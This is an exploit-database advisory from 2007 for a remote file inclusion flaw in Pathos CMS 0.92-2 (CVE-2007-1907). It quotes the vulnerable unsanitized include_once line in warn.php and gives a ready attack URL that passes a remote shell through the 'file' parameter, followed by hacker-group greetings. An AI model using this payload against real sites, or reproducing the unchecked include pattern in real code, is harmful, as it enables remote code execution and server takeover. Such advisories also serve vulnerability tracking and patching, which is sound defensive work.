Pathos CMS 0.92-2 - 'warn.php' Remote File Inclusion

Author: kezzap66345
type: webapps
platform: php
port: 
date_added: 2007-04-08 
date_updated: 2016-09-30 
verified: 1 
codes: OSVDB-37394;CVE-2007-1907 
tags: 
aliases:  
screenshot_url:  
application_url: http://www.exploit-db.compathos-0.92-2.tar.gz

Pathos Content Management System
*****************
Found by kezzap66345 *
*****************
*****************
Script download::    http://sourceforge.net/projects/pathos/
Direct link     :
http://sourceforge.net/project/showfiles.php?group_id=103303&package_id=110862&release_id=243512

*****************
*****************
ERROR#1:
File:warn.php
*****************

include_once($_GET['file'] . ".html");   <<< rfi coded


**************************************************************************************
RFI#1:

http://SITE.com/path/warn.php?file=[SHELL]


**************************************************************************************
**************************************************************************************
Thanks:@_-_-_| i!..:: S.H.i.K.a.A ::..!i
****x0r0n**********..:a.j.a.n..:*************
**************************************************************************************
**************************************************************************************
**************************************************************************************
**************************************************************************************
******Thanx****SiiRCiCOCUK****str0ke**************************************************

# milw0rm.com [2007-04-09]